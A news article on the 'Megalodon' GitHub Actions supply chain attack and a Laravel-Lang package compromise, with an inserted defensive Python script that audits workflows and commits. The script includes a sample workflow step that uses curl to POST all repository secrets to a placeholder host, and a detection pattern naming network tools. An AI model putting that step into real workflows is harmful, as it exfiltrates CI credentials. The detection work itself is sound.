Massive Megalodon supply chain attack compromises over 5,500 GitHub repos

Cybersecurity researchers have uncovered a large-scale supply chain attack that compromised more than 5,500 GitHub repositories via malicious automated commits. The campaign, dubbed “Megalodon,” targeted GitHub Actions workflows to steal sensitive credentials, tokens, and cloud secrets from infected systems.

According to security firm SafeDep, attackers injected over 5,700 malicious commits into repositories within a six-hour period on May 18 using throwaway accounts and forged author identities. The malicious payloads added hidden GitHub Actions workflows that either triggered automatically on push and pull requests or silently replaced existing workflows to create dormant backdoors.

The malware exfiltrated a wide range of sensitive information, including AWS credentials, Google Cloud and Azure tokens, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, and GitHub and GitLab CI/CD tokens.

Researchers traced the campaign to compromised versions of the open-source chatbot platform called 'Tiledesk,' which were published to NPM between May 19 and May 21. The attacker did not breach the maintainer’s NPM account directly. Instead, the threat actor compromised the GitHub repository and poisoned the source code before the maintainer unknowingly published the infected packages.

The malicious commits were attributed to a user identified as “build-bot.” SafeDep’s investigation linked nearly 5,700 commits across two associated email addresses, all created on the same day.

Researchers also warned that the attacker exploited GitHub’s workflow_dispatch feature, which allows workflows to be triggered through the GitHub API and bypasses certain anti-recursion protections. This could enable attackers to reactivate dormant backdoors later using stolen GitHub tokens.
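As an added example (not SafeDep's tooling and not code from the Tiledesk project), the Python script below implements the defender-side check the two paragraphs above call for: it flags workflow files whose triggers include push, pull_request or workflow_dispatch and whose steps both reference repository secrets and invoke an outbound network tool, and it separately lists commits touching `.github/workflows/` whose author e-mail is not on a trusted list. It uses regular expressions rather than a YAML parser so it runs with the standard library alone; it therefore covers the common `on:` spellings but not every YAML form. The sample workflows, git log, domain and e-mail addresses are constructed placeholders.

```python
"""Heuristic audit for the GitHub Actions abuse pattern described in the
article: workflow files that fire on push / pull_request (or can be re-fired
through workflow_dispatch) and read secrets while making an outbound call.
Added example, not SafeDep's tooling; standard library only."""
import re
from dataclasses import dataclass, field

HEADER = re.compile(r"^[0-9a-f]{7,40}\|")  # git log header line: sha|name|email
SECRET_REF = re.compile(
    r"\$\{\{\s*(secrets\.[A-Za-z0-9_]+|toJSON\(\s*secrets\s*\))\s*\}\}")
WHOLE_CONTEXT = re.compile(r"toJSON\(\s*secrets\s*\)")  # dumps every secret
EGRESS = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|iwr)\b")
WATCHED_TRIGGERS = {"push", "pull_request", "workflow_dispatch"}
WORKFLOW_FILE = re.compile(r"^\.github/workflows/[^/]+\.ya?ml$")


@dataclass
class Finding:
    path: str
    triggers: list
    reasons: list = field(default_factory=list)


def parse_triggers(text):
    """Return event names under the top-level `on:` key. Handles `on: push`,
    `on: [push, pull_request]` and the indented block form."""
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^on:\s*(.*?)\s*$", line)
        if not m:
            continue
        rest = m.group(1)
        if rest.startswith("["):  # flow sequence
            return {t.strip().strip("'\"") for t in rest.strip("[]").split(",") if t.strip()}
        if rest:  # single scalar
            return {rest.strip("'\"")}
        triggers, indent = set(), None  # block form: keys at the first indent level
        for nxt in lines[i + 1:]:
            if not nxt.strip():
                continue
            cur = len(nxt) - len(nxt.lstrip())
            if cur == 0:
                break  # next top-level key ends the `on:` block
            indent = cur if indent is None else indent
            if cur == indent:
                triggers.add(nxt.strip().lstrip("- ").split(":")[0].strip("'\""))
        return triggers
    return set()


def audit_workflow(path, text):
    """Flag a workflow that reads secrets and calls an egress tool; record
    which watched triggers would fire it."""
    triggers = parse_triggers(text)
    reasons = []
    if SECRET_REF.search(text) and EGRESS.search(text):
        reasons.append("reads secrets and invokes an outbound network tool")
    if WHOLE_CONTEXT.search(text):
        reasons.append("serialises the entire secrets context")
    if not reasons:
        return None
    if "workflow_dispatch" in triggers:
        reasons.append("re-triggerable via the API (workflow_dispatch) without a new commit")
    return Finding(path, sorted(triggers & WATCHED_TRIGGERS), reasons)


def audit_workflow_commits(git_log, trusted_emails):
    """Parse `git log --format='%H|%an|%ae' --name-only` output; return
    (sha, author, email) for commits touching workflow files by untrusted authors."""
    flagged, current = [], None
    for line in git_log.splitlines():
        if not line.strip():
            continue
        if HEADER.match(line):
            sha, name, email = line.split("|", 2)
            current = (sha, name, email)
        elif current and WORKFLOW_FILE.match(line.strip()) \
                and current[2] not in trusted_emails and current not in flagged:
            flagged.append(current)
    return flagged


# Constructed samples for illustration only (not the real Megalodon payload).
BENIGN_CI = """\
name: CI
on:
  push:
    branches: [main]
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""
SUSPICIOUS = """\
name: build
on: [push, pull_request, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: curl -s -X POST -d "${{ toJSON(secrets) }}" https://collector.invalid/
"""
SAMPLE_LOG = """\
a1b2c3d|Maintainer|maintainer@example.invalid
src/app.js

d4e5f6a|build-bot|build-bot@example.invalid
.github/workflows/build.yml
.github/workflows/ci.yml
"""
TRUSTED = {"maintainer@example.invalid"}

if __name__ == "__main__":
    for path, text in {"ci.yml": BENIGN_CI, "build.yml": SUSPICIOUS}.items():
        found = audit_workflow(path, text)
        print(path, "->", "clean" if found is None else found)
    print(audit_workflow_commits(SAMPLE_LOG, TRUSTED))
```

Run it against a checkout by reading each file under `.github/workflows/` into `audit_workflow`, and feed it real `git log --format='%H|%an|%ae' --name-only` output with your maintainers' addresses in the trusted set; a hit from an unknown author on a workflow file is the signal to compare that file against the last known-good revision rather than trust the commit metadata, which the article notes was forged.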

In a separate incident, four popular Composer packages maintained by the Laravel-Lang organization were compromised in a supply chain attack after hackers rewrote all their Git tags with malicious code. The affected packages (laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions) are popular localization libraries used in Laravel applications. The attack began on May 22, when attackers published malicious version tags during a brief 15-minute window. Researchers say more than 700 historical versions across the packages were modified, potentially exposing any applications that updated or installed the packages during that period to malware.